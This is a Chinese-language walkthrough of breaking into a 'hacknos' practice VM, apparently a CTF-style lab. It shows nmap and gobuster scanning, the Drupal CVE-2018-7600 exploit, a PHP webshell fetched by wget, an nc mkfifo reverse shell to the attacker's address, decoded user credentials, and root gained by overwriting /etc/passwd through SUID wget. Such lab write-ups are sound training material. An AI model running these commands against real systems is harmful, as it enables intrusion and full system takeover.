hacknos靶机实战

工具:

kali 192.168.1.6

nmap

 

打开使用nmap -sP 192.168.1.0/24 扫描活跃的主机

hacknos靶机实战_第1张图片

发现目标ip
使用nmap 查看开启了什么服务
Nmap -v -A -PN ip
-v 详细信息输出
-A 综合扫描,包含1-10000的端口ping扫描,
操作系统扫描,脚本扫描,路由跟踪,服务探测
-PN选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火墙保护的主机时,这是非常有用的。
结果:

hacknos靶机实战_第2张图片

 

 

 两个端口服务

打开浏览器访问也是很正常的apache服务
扫描目录
gobuster dir -u http://192.168.1.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txthacknos靶机实战_第3张图片

 

 

发现一个目录访问后是个登入界面 看到下面 由Drupal提供支持

hacknos靶机实战_第4张图片

 

 

 

百度一下

发现是个内容管理系统

hacknos靶机实战_第5张图片

 

 

 找一下看看有没有历史exp

https://github.com/pimps/CVE-2018-7600
下载exp然后进入
因为exp是使用python3 所以用p3打开
Python3 drupa7-CVE-2018-7600.py http://192.168.1.10/drupal/ -c +命令
+ls 查看目录

hacknos靶机实战_第6张图片

准备反弹一个shell来 先创建一个shell zss.php

然后把它传到目标目录下

这里开启httpd 命令python -m SimpleHTTPServer
创建一句话php
使用wegt下载单个文件 wget+url
Python3 drupa7-CVE-2018-7600.py http://192.168.1.10/drupal/ -c "wegt http://192.168.1.9:8000/zss.php"

wget命令用来从指定的URL下载文件
更多wget参数 http://www.manongjc.com/detail/14-zfjbmktrofpigin.html

Python3 drupa7-CVE-2018-7600.py http://192.168.1.10/drupal/ -c ls查看文件是否存在
进入浏览器访问一下

 

 

 

然后反弹shell回来

加个id访问一下shell

hacknos靶机实战_第7张图片

 

 

 


打开burp抓包
因为我写的一句话是system($_POST['zss'])
要改成post 发送试试

hacknos靶机实战_第8张图片

 

 

 

接下来通过命令查找nc 是否存在 which nc 存在的情况下 用nc反弹
参考反弹备忘录https://www.moonsec.com/archives/647
Zss=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 9001 >/tmp/f
编码发送后打开端口监听
Nc -lvnp 9001

hacknos靶机实战_第9张图片

 

 

 

接下来将简单的Shell转换成为完全交互式的TTY 
创建一个原生的终端 使用python提供的pty模块命令如下:
Python3 -c 'import pty:pty.spawn("/bin/bash")'
然后
按Ctrl-Z键将shell调至后台运行
接着我们将当前STTY设置为raw(请确保shell仍在后台运行),并使用以下命令回显输入
Stty raw -echo
(stty命令的作用:为了自己能够编写适合自己的终端驱动函数,即去修改终端驱动程序里面的设置。在Linux中有这个命令,就是stty。)
进入到了fg(前台)( 直接fg回车)

hacknos靶机实战_第10张图片

 

 

 

完全交互式的TTY转换完成
这一段参考文章https://www.sohu.com/a/161766202_709042

查看用户Cat /home/passwd
发现一个root和james用户 但root是没权限访问

hacknos靶机实战_第11张图片

 

 

 在上级目录发现个文件解码一下

hacknos靶机实战_第12张图片

 

 

 解码网站:https://tool.bugku.com/brainfuck/?wafcloud=1

再次解密后为
james:Hacker@4514
尝试登入一下

hacknos靶机实战_第13张图片

登入失败


再尝试提权
发现一个wget文件

然后想起看的一篇文章讲过wget的方法提权

https://www.cnblogs.com/linuxsec/articles/9193048.html

hacknos靶机实战_第14张图片

 

 

wget 是拥有root权限 即可以通过wget 下载可以替换文件

将passwd文件添加一个root权限用户 然后再替换靶机里的passwd
将目标passwd复制 在本地创建一个同名文件内容粘贴上去
生成用户密码

 

 然后给以root权限 添加至passwd

zhh:$1$zhh$oW.m7I84VfqHwcxRhE/yF1:0:0:root:/root:/bin/bash

接下来从本机下载passwd替换 目标passwd
Wget http://本机ip+端口 -O 目标文件

hacknos靶机实战_第15张图片

 

 

查看passwd是否被替换

hacknos靶机实战_第16张图片

 

 

看见了添加的zhh用户

hacknos靶机实战_第17张图片

 

 


登入成功root权限

你可能感兴趣的:(hacknos靶机实战)